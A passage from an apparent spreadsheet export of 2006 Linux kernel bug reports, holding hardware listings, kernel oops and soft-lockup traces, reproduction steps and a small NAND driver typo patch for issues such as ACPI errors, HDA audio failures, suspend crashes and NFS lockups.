Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #2 (rev 03) (prog-if 00 [UHCI]) Subsystem: IBM Unknown device 0565 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 217 Region 4: I/O ports at 1840 [size=32] 00:1d.2 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #3 (rev 03) (prog-if 00 [UHCI]) Subsystem: IBM Unknown device 0565 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin C routed to IRQ 225 Region 4: I/O ports at 1860 [size=32] 00:1d.3 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #4 (rev 03) (prog-if 00 [UHCI]) Subsystem: IBM Unknown device 0565 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin D routed to IRQ 201 Region 4: I/O ports at 1880 [size=32] 00:1d.7 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB2 EHCI Controller (rev 03) (prog-if 20 [EHCI]) Subsystem: IBM Unknown device 0566 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin D routed to IRQ 201 Region 0: Memory at a0040000 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Debug port [...] lsusb -v [...] Bus 001 Device 003: ID 059f:0643 LaCie, Ltd Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 2.00 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 64 idVendor 0x059f LaCie, Ltd idProduct 0x0643 bcdDevice 0.00 iManufacturer 1 LaCie iProduct 2 LaCie DVDRW USB iSerial 3 10000F100A571126 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 32 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xc0 Self Powered MaxPower 2mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 2 bInterfaceClass 8 Mass Storage bInterfaceSubClass 5 SFF-8070i bInterfaceProtocol 80 iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0200 1x 512 bytes bInterval 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x02 EP 2 OUT bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0200 1x 512 bytes bInterval 0 Device Qualifier (for other device speed): bLength 10 bDescriptorType 6 bcdUSB 2.00 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 64 bNumConfigurations 1 Device Status: 0x0001 Self Powered [...]</t>
  </si>
  <si>
    <t>Handle is NULL and Pathname is relative [20060127] - Compaq Presario serie V2000 and BIOS F.26</t>
  </si>
  <si>
    <t>2006-07-11 07:03 UTC</t>
  </si>
  <si>
    <t>Cristian Aravena Romero</t>
  </si>
  <si>
    <t>2007-03-08 00:32 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.15-25 (kernel of Ubuntu Dapper) Distribution: Ubuntu Edgy (now is developer) Hardware Environment: https://wiki.ubuntu.com/LaptopTestingTeam/CompaqPresarioV2417LA/Hardware Software Environment: Software default of Ubuntu Edgy Problem Description: Package: linux-image-2.6.17-3-k7 Version: 2.6.17-3.4 I write in console dmesg, and read error: $dmesg [17179569.184000] Linux version 2.6.17-3-k7 (buildd@vernadsky) (gcc version 4.1.2 20060613 (prerelease) (Ubuntu 4.1.1-2ubuntu3)) #1 SMP Thu Jun 29 04:37:13 UTC 2006 [...] [17179571.960000] ACPI: bus type pci registered [17179571.960000] PCI: BIOS Bug: MCFG area is not E820-reserved [17179571.960000] PCI: Not using MMCONFIG. [17179571.960000] PCI: PCI BIOS revision 2.10 entry at 0xfd8bc, last bus=5 [17179571.960000] Setting up standard PCI resources [17179571.960000] ACPI: Subsystem revision 20060127 [17179571.960000] ACPI: Interpreter enabled [17179571.960000] ACPI: Using IOAPIC for interrupt routing [17179571.960000] ACPI Error (nsxfeval-0242): Handle is NULL and Pathname is relative [20060127] [17179571.960000] ACPI Error (nsxfeval-0242): Handle is NULL and Pathname is relative [20060127] [17179571.960000] ACPI Error (nsxfeval-0242): Handle is NULL and Pathname is relative [20060127] [17179571.960000] ACPI Error (nsxfeval-0242): Handle is NULL and Pathname is relative [20060127] [17179571.960000] ACPI: PCI Root Bridge [PCI0] (0000:00) -- System Information: Debian Release: testing/unstable APT prefers edgy APT policy: (500, 'edgy') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/dash Kernel: Linux 2.6.17-3-k7 Locale: LANG=es_CL.UTF-8, LC_CTYPE=es_CL.UTF-8 (charmap=UTF-8) Versions of packages linux-image-2.6.17-3-k7 depends on: ii coreutils [fileutils] 5.93-5ubuntu5 The GNU core utilities ii initramfs-tools 0.40ubuntu32 tools for generating an initramfs ii module-init-tools 3.2.2-3ubuntu3 tools for managing Linux kernel mo Versions of packages linux-image-2.6.17-3-k7 recommends: ii grub 0.97-11ubuntu1 GRand Unified Bootloader Steps to reproduce: Update kernel of 2.6.15-25 to kernel 2.6.17-3 and work BIOS F.25A References: https://launchpad.net/distros/ubuntu/+source/linux-source-2.6.17/+bug/52370</t>
  </si>
  <si>
    <t>Audio with HDA fails on newer kernels</t>
  </si>
  <si>
    <t>2006-07-11 16:29 UTC</t>
  </si>
  <si>
    <t>Robert Thomas</t>
  </si>
  <si>
    <t>2007-09-03 08:09 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution:2.6.15-rc7 Hardware Environment:Clevo D900T Software Environment: Problem Description:Latest kernel cannot operate audio device. Steps to reproduce: Load latest kernel with a Clevo D900T based laptop (HDA Audio). http://www.clevo.com.tw/products/D900T.asp The audio chip is a realtek ACL880 (1558:0900) lcpci output: 00:1b.0 Class 0403: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) High Definition Audio Controller (rev 03) Subsystem: CLEVO/KAPOK Computer: Unknown device 0900 Flags: bus master, fast devsel, latency 0, IRQ 209 Memory at b0000000 (64-bit, non-prefetchable) [size=16K] Capabilities: [50] Power Management version 2 Capabilities: [60] Message Signalled Interrupts: 64bit+ Queue=0/0 Enable- Capabilities: [70] Express Unknown type IRQ 0 Capabilities: [100] Virtual Channel Capabilities: [130] Unknown (5) Between the older working kernel and newest broken kernel, the kernel output messages are the same up to a point, i.e.: hda_codec: Unknown model for ALC880, trying auto-probe from BIOS... hda_codec: Cannot set up configuration from BIOS. Using 3-stack mode... ALSA device list: #0: HDA Intel at 0xb0000000 irq 209 The failing kernel messages (lots and lots of them) I get are: kernel: ALSA sound/pci/hda/hda_intel.c:565: hda-intel: send_cmd timeout:IRS=0x1, val=0x10a90000</t>
  </si>
  <si>
    <t>Sergej Pupykin</t>
  </si>
  <si>
    <t>io_getevents() says an extending write is complete before i_size is updated</t>
  </si>
  <si>
    <t>2.6.9-34.0.1.ELsmp 2.6.16-gentoo-r6 2.6.16-1.2122_FC5smp</t>
  </si>
  <si>
    <t>2006-07-14 02:14 UTC</t>
  </si>
  <si>
    <t>Rafal Wijata</t>
  </si>
  <si>
    <t>2008-01-03 14:46 UTC</t>
  </si>
  <si>
    <t>Zach Brown</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: gentoo RHAS4.3 FC5 Hardware Environment: various Software Environment: libaio Problem Description: after io_getevents reports that write/appen was done, the data in file is still unaccessible (neither reported by fstat() nor readable via io_submit()) Steps to reproduce: gcc aiotest-wait.c -laio -lpthread run attached test on SMP few times for UP edit source and initialize thread_write with fun_write1() NOTE: if synch is introduced (not fstating until write io_submit() returns) all is fine. For test that compile with gcc aiotest-wait.c -DDO_SYNCH -laio -lpthread</t>
  </si>
  <si>
    <t>variable name confuse in nand_base.c</t>
  </si>
  <si>
    <t>2.6.18-rc1-git8</t>
  </si>
  <si>
    <t>2006-07-14 19:57 UTC</t>
  </si>
  <si>
    <t>liyu</t>
  </si>
  <si>
    <t>2006-10-24 03:48 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: The laest kernel stiil have it. Distribution: Any. Hardware Environment: AMD CS5536 Flash interface and SAMSUNG K9K8G08U0A chip But I think all platform alway have this problem. Software Environment: GCC 3.3.3 Problem Description: This is one patch that bugfix one typo in drivers/mtd/nand/nand_base.c. It seem we lost the character 'x' here. Steps to reproduce: If we insert driver for this flash controller (cs553x_nand.ko)&amp;#65292; nand_get_flash_type() can read maf_id truely, but printk output wrong maf id (0x98, but it should be 0xec) and name. Patch: --- nand_base.c.orig 2006-07-14 15:30:04.000000000 +0800 +++ nand_base.c 2006-07-14 15:30:46.000000000 +0800 @@ -2222,7 +2222,7 @@ } /* Try to identify manufacturer */ - for (maf_idx = 0; nand_manuf_ids[maf_idx].id != 0x0; maf_id++) { + for (maf_idx = 0; nand_manuf_ids[maf_idx].id != 0x0; maf_idx++) { if (nand_manuf_ids[maf_idx].id == *maf_id) break; }</t>
  </si>
  <si>
    <t>HPA needs to be reinitilized on resume</t>
  </si>
  <si>
    <t>2.6.17-Present</t>
  </si>
  <si>
    <t>2006-07-15 18:35 UTC</t>
  </si>
  <si>
    <t>Lee Trager</t>
  </si>
  <si>
    <t>2007-06-18 10:24 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Unknown Distribution: Gentoo 2006.0 Hardware Environment: IBM Thinkpad T40 IDE Controller: Intel Corporation 82801DBM (ICH4-M) IDE Controller (rev 01) Harddrive: Hitachi IC25N040ATCS05-0 Software Environment: GLIBC: 2.4 GCC: 4.1.1 Problem Description: Upon resuming my laptop from sleep mode or hibernate mode my harddrive has full usage and my dmesg is fill with this ide: failed opcode was: unknown hda: task_out_intr: status=0x51 { DriveReady SeekComplete Error } hda: task_out_intr: error=0x10 { SectorIdNotFound }, LBAsect=74853287, sector=74853287 I checked the drive with the IBM hardware analysis tools as well as the Hitachi Drive Fitness extended test and both say the drive is fine. What is strange is that according to hdparm my drive only has 72037362 sectors while this error is on sector 74853287. This error happens with and without wireless DMA and alsa. The kernel option in ATA/ATAPI/MFM/RLL support named IDEDISK_MULTI_MODE does not fix the error. I have also tested this with the mainline kernel, supend2 sources, and gentoo sources and this error happens on all of them. Steps to reproduce: 1. Put computer into sleep mode or hibernate mode 2. Wake the computer up</t>
  </si>
  <si>
    <t>2.6.18-rc2</t>
  </si>
  <si>
    <t>Wireless</t>
  </si>
  <si>
    <t>Markus Meier</t>
  </si>
  <si>
    <t>System hang if set aperture to 128M on 915G/945G platforms</t>
  </si>
  <si>
    <t>2006-07-16 19:19 UTC</t>
  </si>
  <si>
    <t>2007-06-17 19:28 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: None Distribution: Debian+Kernel 2.6.17+Xorg7.1 Hardware Environment: Intel 945GNTLR (http://www.intel.com/products/motherboard/d945gnt/index.htm) P4 3.0G with 1G RAM Software Environment: Debian+Kernel 2.6.17+Xorg7.1+Gcc 4.03 Problem Description: System hang if set aperture to 128M on 915G/945G platforms Steps to reproduce: 1. set aperture size to 128M in BIOS setup 2. boot the machine with intel-agp loaded 3. system will hang immediately</t>
  </si>
  <si>
    <t>speedstep-centrino does not work on Intel Core Duo T2400</t>
  </si>
  <si>
    <t>2006-07-17 05:04 UTC</t>
  </si>
  <si>
    <t>martin skytte</t>
  </si>
  <si>
    <t>2007-05-17 14:16 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: never worked Distribution: Arch Linux Hardware Environment: Zepto Znote 6214w (laptop). i945pm chipset, T2400 cpu Software Environment: Problem Description: Any attempt to load speedstep-centrino results in "No such device" Steps to reproduce: Load the module</t>
  </si>
  <si>
    <t>Suspend to RAM and Ondemand Lockup/Stack trace</t>
  </si>
  <si>
    <t>2.16.18-rc1, 2.6.18-rc1-mm1, 2.6.18-rc1-mm2</t>
  </si>
  <si>
    <t>2006-07-17 08:38 UTC</t>
  </si>
  <si>
    <t>Brandon Philips</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Debian GNU/Linux (unstable) Hardware Environment: Thinkpad x60s w/ Forrest Zhao's patches for AHCI suspend: http://marc.theaimsgroup.com/?l=linux-ide&amp;m=115277002327654&amp;w=2 Software Environment: gcc version 4.1.2 20060630 (prerelease) (Debian 4.1.1-6) Problem Description: Suspend to ram failure (echo mem &gt; /sys/power/state) w/ backtrace on 2.6.18-rc1-mm1 Steps to reproduce: 1) Use ondemand governor 2) echo mem &gt; /sys/power/state 3) Freezing cpus ... CPU 1 is now offline SMP alternatives: switching to UP code divide error: 0000 [#1] 8K_STACKS SMP last sysfs file: /power/state Modules linked in: binfmt_misc rfcomm l2cap bluetooth ipv6 nvram uinput button ac battery joydev ibm_acpi hdaps cpufreq_userspace speedstep_centrino freq_table sbp2 cpufreq_ondemand tsdev intelfb i2c_algo_bit snd_hda_intel i2c_i801 psmouse nsc_ircc snd_hda_codec pcspkr intel_agp agpgart eth1394 evdev i2c_core serio_raw irda snd_pcm snd_timer snd soundcore yenta_socket rsrc_nonstatic pcmcia_core snd_page_alloc crc_ccitt ata_piix piix sd_mod generic ide_core uhci_hcd ohci1394 ieee1394 ehci_hcd usbcore e1000 ahci libata scsi_mod thermal processor fan CPU: 0 EIP: 0060:[&lt;f8a0d20d&gt;] Not tainted VLI EFLAGS: 00210246 (2.6.18-rc1-mm1 #2) EIP is at do_dbs_timer+0xcb/0x14e [cpufreq_ondemand] eax: 00000000 ebx: 00000000 ecx: 00000001 edx: 00000000 esi: c1dda380 edi: 00000002 ebp: c1dda380 esp: f7d5ff4c ds: 007b es: 007b ss: 0068 Process kondemand/0 (pid: 5266, ti=f7d5e000 task=dff48b90 task.ti=f7d5e000) Stack: 00000000 c1bfaba0 00000000 00000000 c1c02bb4 c1c02bb8 f7f69d80 00200286 c012c04c 00000000 f8a0d142 00000000 f7f69d94 f7f69d80 f7f69d8c 00000000 c012c9a2 00000001 00000000 c1c01280 00010000 00000000 00000000 dff48b90 Call Trace: [&lt;c012c04c&gt;] run_workqueue+0x80/0xbc [&lt;f8a0d142&gt;] do_dbs_timer+0x0/0x14e [cpufreq_ondemand] [&lt;c012c9a2&gt;] worker_thread+0xf3/0x125 [&lt;c0117c57&gt;] default_wake_function+0x0/0x15 [&lt;c012c8af&gt;] worker_thread+0x0/0x125 [&lt;c012ef9c&gt;] kthread+0xc3/0xef [&lt;c012eed9&gt;] kthread+0x0/0xef [&lt;c0101005&gt;] kernel_thread_helper+0x5/0xb Code: 00 39 44 24 0c 0f 46 44 24 0c 89 44 24 0c 56 57 e8 2f 79 7c c7 5b 89 c7 5d 83 ff 01 76 a3 8b 44 24 08 31 d2 2b 44 24 0c 6b c0 64 &lt;f7&gt; 74 24 08 89 c1 a1 a8 e6 a0 f8 39 c1 76 0d 8b 46 1c 39 46 20 EIP: [&lt;f8a0d20d&gt;] do_dbs_timer+0xcb/0x14e [cpufreq_ondemand] SS:ESP 0068:f7d5ff4c Note: 2.6.18-rc1 and 2.16.18-rc1-mm2 do not create the stack trace and simply stop suspending at: SMP alternatives: switching to UP code. 5) A ctrl+alt+del reboots the box cleanly</t>
  </si>
  <si>
    <t>NFS-stress triggers Kernel BUG at mm/truncate.c:76</t>
  </si>
  <si>
    <t>2.6.17.6, x86_64</t>
  </si>
  <si>
    <t>2006-07-17 11:24 UTC</t>
  </si>
  <si>
    <t>2006-08-24 02:18 UTC</t>
  </si>
  <si>
    <t>6852 6853</t>
  </si>
  <si>
    <t>Running a machine with 8 dualcore Opterons 875 (16cores total), which makes it far more sensitive to locking-, timing- and racing bugs than the average linux- machine. Running a multi-threaded app (16 threads) that reads small portions of data from a large file (stored on remote server, accessed over NFS-udp), and write back to another file - same NFS-share. System crashes really hard (beyond softwatchdog- and oops-recovery) anywhere between 1 and 15 minutes. On 2.6.15.x, problem appeared first, was fixed by kernelpatches to file.c and pagelist.c. Went to 2.6.17.6 for the much improved multi-dualcore support, same problem appeared - unfortunately the original patch is integrated already, so it must be something else this time. Kernel does not OOPS, but it locks up - on all CPUs, according to the logs. Kernel BUG at mm/truncate.c:76 invalid opcode: 0000 [1] SMP CPU 14 Modules linked in: nfs netconsole sch_sfq cls_u32 sch_tbf sch_prio iptable_filter ip_tables x_tables nfsd exportfs lockd 8250 seri al_core ipv6 parport_pc lp parport autofs4 sunrpc w83627hf_wdt binfmt_misc xfs dm_mod video button battery ac ohci1394 ieee1394 oh ci_hcd ehci_hcd i2c_nforce2 i2c_core tg3 floppy ide_cd cdrom Pid: 8086, comm: dipfilter.x Not tainted 2.6.17.6 #1 RIP: 0010:[&lt;ffffffff8025eb96&gt;] &lt;ffffffff8025eb96&gt;{invalidate_complete_page+86} RSP: 0018:ffff810393c09ca8 EFLAGS: 00010002 RAX: 0000000000000825 RBX: ffff8105ff8d86f0 RCX: ffff8103f271bb08 RDX: 0000000000000000 RSI: ffff810393c09c48 RDI: ffff8103f271bd88 RBP: ffff8103f271bd70 R08: 0000000000000001 R09: 000000000000002c R10: 000000000000002c R11: ffff8105f8a26240 R12: ffff810393c09e08 R13: 0000000000000000 R14: ffff8103f271bd70 R15: 00000000000d1a2c FS: 00002accace13dc0(0000) GS:ffff810e001bd9c0(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b CR2: 00002b050fbff000 CR3: 0000000ff7c21000 CR4: 00000000000006e0 Process dipfilter.x (pid: 8086, threadinfo ffff810393c08000, task ffff8103f8b70280) Stack: 00000000000d1a2b ffff8105ff8d86f0 0000000000000000 ffffffff8025f0c0 0000000000000000 00000000f271bc28 0000000000000000 ffffffffffffffff 000000000000000e 0000000000000000 Call Trace: &lt;ffffffff8025f0c0&gt;{invalidate_inode_pages2_range+320} &lt;ffffffff882042d9&gt;{:nfs:nfs_revalidate_mapping+105} &lt;ffffffff88202e29&gt;{:nfs:nfs_file_write+169} &lt;ffffffff8027d710&gt; {do_sync_write+208} &lt;ffffffff802424e0&gt;{autoremove_wake_function+0} &lt;ffffffff80227a00&gt; {default_wake_function+0} &lt;ffffffff8027d80f&gt;{vfs_write+191} &lt;ffffffff8027d9a3&gt;{sys_write+83} &lt;ffffffff80209c06&gt;{system_call+126} Code: 0f 0b 68 dc f2 46 80 c2 4c 00 48 89 df e8 18 74 ff ff f0 81 RIP &lt;ffffffff8025eb96&gt;{invalidate_complete_page+86} RSP &lt;ffff810393c09ca8&gt; NMI Watchdog detected LOCKUP on CPU 10 CPU 10 Modules linked in: nfs netconsole sch_sfq cls_u32 sch_tbf sch_prio iptable_filter ip_tables x_tables nfsd exportfs lockd 8250 seri al_core ipv6 parport_pc lp parport autofs4 sunrpc w83627hf_wdt binfmt_misc xfs dm_mod video button battery ac ohci1394 ieee1394 oh ci_hcd ehci_hcd i2c_nforce2 i2c_core tg3 floppy ide_cd cdrom Pid: 8106, comm: dipfilter.x Not tainted 2.6.17.6 #1 RIP: 0010:[&lt;ffffffff80309579&gt;] &lt;ffffffff80309579&gt;{__read_lock_failed+5} RSP: 0018:ffff8103f8647c08 EFLAGS: 00000097 RAX: ffff8103f271bd88 RBX: 00000000000d2431 RCX: ffff8103f8647d58 RDX: 0000000000000000 RSI: 00000000000d2431 RDI: ffff8103f271bd88 RBP: ffff8103f271bd70 R08: ffff8103f8646000 R09: 00000000ffffffff R10: 00000000d2864068 R11: 0000000000000001 R12: ffff8103f271bd70 R13: 0000000000001000 R14: 0000000000001000 R15: ffff8103f8e83be8 FS: 00002b15cc9e2dc0(0000) GS:ffff810a0016ad40(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b CR2: 00007fff0b64dbd8 CR3: 0000000393c21000 CR4: 00000000000006e0 Process dipfilter.x (pid: 8106, threadinfo ffff8103f8646000, task ffff8103f8645820) Stack: ffffffff8044802a ffffffff802569b5 ffff8103f271bd70 ffff810bff67f678 00000000000d2431 ffffffff80256f7d ffffffff804479ec 0000000000000000 0000000000000000 00000000d2438000 Call Trace: &lt;ffffffff8044802a&gt;{.text.lock.spinlock+83} &lt;ffffffff802569b5&gt;{find_get_page+21} &lt;ffffffff80256f7d&gt; {do_generic_mapping_read+397} &lt;ffffffff804479ec&gt;{__up_wakeup+53} &lt;ffffffff80257360&gt;{file_read_actor+0} &lt;ffffffff802591e9&gt;{__generic_file_aio_read+425} &lt;ffffffff802593f4&gt; {generic_file_aio_read+52} &lt;ffffffff88202aba&gt;{:nfs:nfs_file_read+170} &lt;ffffffff8027d490&gt; {do_sync_read+208} &lt;ffffffff802424e0&gt;{autoremove_wake_function+0} &lt;ffffffff80227a00&gt; {default_wake_function+0} &lt;ffffffff8027d58c&gt;{vfs_read+188} &lt;ffffffff8027d913&gt;{sys_read+83} &lt;ffffffff80209c06&gt;{system_call+126} Code: 83 38 01 78 f9 f0 ff 08 0f 88 ed ff ff ff c3 90 90 90 90 90 console shuts up ... NMI Watchdog detected LOCKUP on CPU 0 &lt;and so on for all CPUs&gt;</t>
  </si>
  <si>
    <t>Soft Lockup in process kblockd seemingly related to CFQ under concurrent I/O load.</t>
  </si>
  <si>
    <t>2.6.16.26 + Areca patches from -mm2</t>
  </si>
  <si>
    <t>2006-07-17 23:38 UTC</t>
  </si>
  <si>
    <t>Gabor K. Horvath</t>
  </si>
  <si>
    <t>2006-07-20 05:26 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:2.6.14.6 Distribution:Debian Hardware Environment: 0000:00:00.0 Host bridge: Intel Corp. Server Memory Controller Hub (rev 0c) 0000:00:02.0 PCI bridge: Intel Corp. Memory Controller Hub PCI Express Port A0 (rev 0c) 0000:00:03.0 PCI bridge: Intel Corp. Memory Controller Hub PCI Express Port A1 (rev 0c) 0000:00:1c.0 PCI bridge: Intel Corp. 6300ESB 64-bit PCI-X Bridge (rev 02) 0000:00:1d.0 USB Controller: Intel Corp. 6300ESB USB Universal Host Controller (rev 02) 0000:00:1d.1 USB Controller: Intel Corp. 6300ESB USB Universal Host Controller (rev 02) 0000:00:1d.4 System peripheral: Intel Corp. 6300ESB Watchdog Timer (rev 02) 0000:00:1d.5 PIC: Intel Corp. 6300ESB I/O Advanced Programmable Interrupt Controller (rev 02) 0000:00:1d.7 USB Controller: Intel Corp. 6300ESB USB2 Enhanced Host Controller (rev 02) 0000:00:1e.0 PCI bridge: Intel Corp. 82801 PCI Bridge (rev 0a) 0000:00:1f.0 ISA bridge: Intel Corp. 6300ESB LPC Interface Controller (rev 02) 0000:00:1f.1 IDE interface: Intel Corp. 6300ESB PATA Storage Controller (rev 02) 0000:00:1f.3 SMBus: Intel Corp. 6300ESB SMBus Controller (rev 02) 0000:01:00.0 PCI bridge: Intel Corp. PCI Bridge Hub A (rev 09) 0000:01:00.2 PCI bridge: Intel Corp. PCI Bridge Hub B (rev 09) 0000:02:01.0 RAID bus controller: 3ware Inc: Unknown device 1003 0000:03:01.0 Ethernet controller: Intel Corp.: Unknown device 107c (rev 05) 0000:05:01.0 Ethernet controller: Intel Corp. 82541GI/PI Gigabit Ethernet Controller 0000:05:02.0 Ethernet controller: Intel Corp. 82541GI/PI Gigabit Ethernet Controller 0000:06:01.0 Ethernet controller: Intel Corp. 82541GI/PI Gigabit Ethernet Controller 0000:06:02.0 VGA compatible controller: ATI Technologies Inc Rage XL (rev 27) 2x3GHz Xeon w HT 4G memory 3Ware 9550SX-8LP with 5 disks 1 spare + 5 in RAID10 Software Environment: Running over LVM. Using Ext3 on the partition stress was running on. Problem Description: When I create a new kernel build for my servers I always do a thorough stress test. This time I opted for running 'stress -d 2 -c 4 -m 4 -i 4' The machine stayed stable but I got these messages: BUG: soft lockup detected on CPU#0! Pid: 24, comm: kblockd/0 EIP: 0060:[&lt;c0305219&gt;] CPU: 0 EIP is at scsi_request_fn+0x4d/0x2e2 EFLAGS: 00000246 Not tainted (2.6.16.26-pgcom-smp #1) EAX: c357f194 EBX: 00000000 ECX: f7c10c28 EDX: 00000001 ESI: c357f000 EDI: f7d59bb0 EBP: c35fc000 DS: 007b ES: 007b CR0: 8005003b CR2: b0019000 CR3: 004a5000 CR4: 000006f0 [&lt;c01167c5&gt;] __wake_up+0x40/0x56 [&lt;c028a87c&gt;] cfq_kick_queue+0x5a/0xaa [&lt;c012b15f&gt;] run_workqueue+0x76/0xea [&lt;c028a822&gt;] cfq_kick_queue+0x0/0xaa [&lt;c012b315&gt;] worker_thread+0x142/0x164 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c012b1d3&gt;] worker_thread+0x0/0x164 [&lt;c012e7f1&gt;] kthread+0xb7/0xbd [&lt;c012e73a&gt;] kthread+0x0/0xbd [&lt;c0101149&gt;] kernel_thread_helper+0x5/0xb BUG: soft lockup detected on CPU#0! Pid: 24, comm: kblockd/0 EIP: 0060:[&lt;c039af8f&gt;] CPU: 0 EIP is at _spin_unlock_irqrestore+0x5/0x6 EFLAGS: 00000282 Not tainted (2.6.16.26-pgcom-smp #1) EAX: c367ff40 EBX: f7c10c98 ECX: 00000001 EDX: 00000282 ESI: f7c10c9c EDI: c367ff40 EBP: f7d59bb0 DS: 007b ES: 007b CR0: 8005003b CR2: b1a2c000 CR3: 004a5000 CR4: 000006f0 [&lt;c012b14d&gt;] run_workqueue+0x64/0xea [&lt;c028a822&gt;] cfq_kick_queue+0x0/0xaa [&lt;c012b315&gt;] worker_thread+0x142/0x164 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c012b1d3&gt;] worker_thread+0x0/0x164 [&lt;c012e7f1&gt;] kthread+0xb7/0xbd [&lt;c012e73a&gt;] kthread+0x0/0xbd [&lt;c0101149&gt;] kernel_thread_helper+0x5/0xb BUG: soft lockup detected on CPU#0! Pid: 24, comm: kblockd/0 EIP: 0060:[&lt;c028d7e0&gt;] CPU: 0 EIP is at kref_put+0x22/0x9e EFLAGS: 00000206 Not tainted (2.6.16.26-pgcom-smp #1) EAX: c357f224 EBX: c357f224 ECX: f78efd90 EDX: 00000001 ESI: c028d016 EDI: f7d59bb0 EBP: c35fc000 DS: 007b ES: 007b CR0: 8005003b CR2: b3a72000 CR3: 004a5000 CR4: 000006f0 [&lt;c027d5b5&gt;] elv_next_request+0x45/0x15e [&lt;c028d03e&gt;] kobject_put+0x1e/0x22 [&lt;c028d016&gt;] kobject_release+0x0/0xa [&lt;c0305221&gt;] scsi_request_fn+0x55/0x2e2 [&lt;c01167c5&gt;] __wake_up+0x40/0x56 [&lt;c028a87c&gt;] cfq_kick_queue+0x5a/0xaa [&lt;c012b15f&gt;] run_workqueue+0x76/0xea [&lt;c028a822&gt;] cfq_kick_queue+0x0/0xaa [&lt;c012b315&gt;] worker_thread+0x142/0x164 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c012b1d3&gt;] worker_thread+0x0/0x164 [&lt;c012e7f1&gt;] kthread+0xb7/0xbd [&lt;c012e73a&gt;] kthread+0x0/0xbd [&lt;c0101149&gt;] kernel_thread_helper+0x5/0xb BUG: soft lockup detected on CPU#0! Pid: 24, comm: kblockd/0 EIP: 0060:[&lt;c0305219&gt;] CPU: 0 EIP is at scsi_request_fn+0x4d/0x2e2 EFLAGS: 00000246 Not tainted (2.6.16.26-pgcom-smp #1) EAX: c357f194 EBX: 00000000 ECX: f7c10c28 EDX: 00000001 ESI: c357f000 EDI: f7d59bb0 EBP: c35fc000 DS: 007b ES: 007b CR0: 8005003b CR2: b3a72000 CR3: 004a5000 CR4: 000006f0 [&lt;c01167c5&gt;] __wake_up+0x40/0x56 [&lt;c028a87c&gt;] cfq_kick_queue+0x5a/0xaa [&lt;c012b15f&gt;] run_workqueue+0x76/0xea [&lt;c028a822&gt;] cfq_kick_queue+0x0/0xaa [&lt;c012b315&gt;] worker_thread+0x142/0x164 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c0116715&gt;] default_wake_function+0x0/0x12 [&lt;c012b1d3&gt;] worker_thread+0x0/0x164 [&lt;c012e7f1&gt;] kthread+0xb7/0xbd [&lt;c012e73a&gt;] kthread+0x0/0xbd [&lt;c0101149&gt;] kernel_thread_helper+0x5/0xb input: AT Translated Set 2 keyboard as /class/input/input0 